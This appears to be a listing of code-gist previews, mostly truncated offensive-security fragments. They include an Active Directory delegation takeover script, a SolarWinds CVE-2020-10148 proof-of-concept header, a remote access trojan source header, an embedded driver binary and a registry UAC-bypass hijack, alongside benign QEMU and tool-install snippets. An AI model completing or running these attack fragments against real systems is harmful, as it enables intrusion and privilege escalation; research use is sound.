| # Import the Active Directory module | |
| Import-Module ActiveDirectory | |
| # Define the domain name | |
| $domainName = "yourdomain.com" | |
| # Get all computer objects in the domain | |
| $computerObjects = Get-ADComputer -Filter * -SearchBase "DC=$($domainName.Replace('.',',DC='))" -Properties Name | |
| # Iterate over each computer object |
| import sys | |
| import base64 | |
| def xor_encrypt_decrypt(data, key): | |
| encrypted_data = [] | |
| for byte in data: | |
| encrypted_byte = byte ^ key | |
| encrypted_data.append(encrypted_byte) | |
| return bytes(encrypted_data) |
| # import the necessary toolsets | |
| Import-Module .\powermad.ps1 | |
| Import-Module .\powerview.ps1 | |
| # we are TESTLAB\attacker, who has GenericWrite rights over the primary$ computer account | |
| whoami | |
| # the target computer object we're taking over | |
| $TargetComputer = "primary.testlab.local" |
| #include <ntddk.h> | |
| CONST WCHAR g_wzDeviceName[] = L"\\Device\\DriverDeviceName"; | |
| CONST WCHAR g_wzDosDeviceName[] = L"\\DosDevices\\DriverDosDeviceName"; | |
| UNICODE_STRING g_usDeviceName = { 0 }; | |
| UNICODE_STRING g_usDeviceLink = { 0 }; | |
| PDEVICE_OBJECT g_pDevObj = NULL; | |
| VOID DriverUnload( | |
| IN PDRIVER_OBJECT DriverObject |
Goal: Emulate a Raspberry Pi with QEMU in order to run the Raspbian O/S (based on Debian Linux).
The current setup is not ideal. For one thing, the maximum RAM allowed using the "versatile-pb" firmware is 256 Mb. In addition, only the most basic peripherals, a keyboard and mouse, are supported.
A number of articles have been written on this topic. Most are outdated, and the few recent ones are missing key information.
| #Hex Editors | |
| choco install hxd -y | |
| #Debuggers | |
| choco install x64dbg.portable -y | |
| choco install ida-free -y | |
| #Disassemblers | |
| choco install ghidra -y |
| # CVE-2020-10148 (local file disclosure PoC for SolarWinds Orion aka door to SuperNova ? ) | |
| # @0xSha | |
| # (C) 2020 0xSha.io | |
| # Advisory : https://www.solarwinds.com/securityadvisory | |
| # Mitigation : https://downloads.solarwinds.com/solarwinds/Support/SupernovaMitigation.zip | |
| # Details : https://kb.cert.org/vuls/id/843464 | |
| # C:\inetpub\SolarWinds\bin\OrionWeb.DLL | |
| # According to SolarWinds.Orion.Web.HttpModules |
| ; <callisto.asm> - Callisto source | |
| ; Copyright (c) 2020 by Josh Finley. | |
| ; | |
| ; This file demonstrates a MASM-64 remote acess trojan. | |
| ; | |
| ; The author assumes no responsibility for any damage caused by this | |
| ; program, incidental or otherwise. This program is intended for | |
| ; research purposes only. | |
| ; | |
| ; References: |
| // Source: https://github.com/hoangprod/DanSpecial/blob/master/DanSpecial/Gigabytes.h | |
| unsigned char rawData[26192] = { | |
| 0x4D, 0x5A, 0x90, 0x00, 0x03, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, | |
| 0xFF, 0xFF, 0x00, 0x00, 0xB8, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, | |
| 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, | |
| 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, | |
| 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, | |
| 0xD8, 0x00, 0x00, 0x00, 0x0E, 0x1F, 0xBA, 0x0E, 0x00, 0xB4, 0x09, 0xCD, | |
| 0x21, 0xB8, 0x01, 0x4C, 0xCD, 0x21, 0x54, 0x68, 0x69, 0x73, 0x20, 0x70, |
| Windows Registry Editor Version 5.00 | |
| [HKEY_CURRENT_USER\Software\Classes\Launcher.SystemSettings] | |
| @="Open" | |
| [HKEY_CURRENT_USER\Software\Classes\Launcher.SystemSettings\Shell] | |
| [HKEY_CURRENT_USER\Software\Classes\Launcher.SystemSettings\Shell\Open] | |
| @="Open" | |
| "MuiVerb"="@appresolver.dll,-8501" |
